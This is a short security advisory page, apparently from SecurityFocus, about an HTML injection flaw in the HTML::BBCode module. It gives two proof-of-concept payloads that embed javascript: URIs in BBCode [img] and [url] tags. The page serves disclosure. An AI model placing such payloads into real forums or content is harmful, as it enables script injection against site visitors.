HTML::BBCode HTML Injection Vulnerability


An exploit is not required.


Examples have been provided:

[img]javascript:alert(123)[/img]

[url=javascript:alert(123)]Click me[/url]


 

Privacy Statement
Copyright 2010, SecurityFocus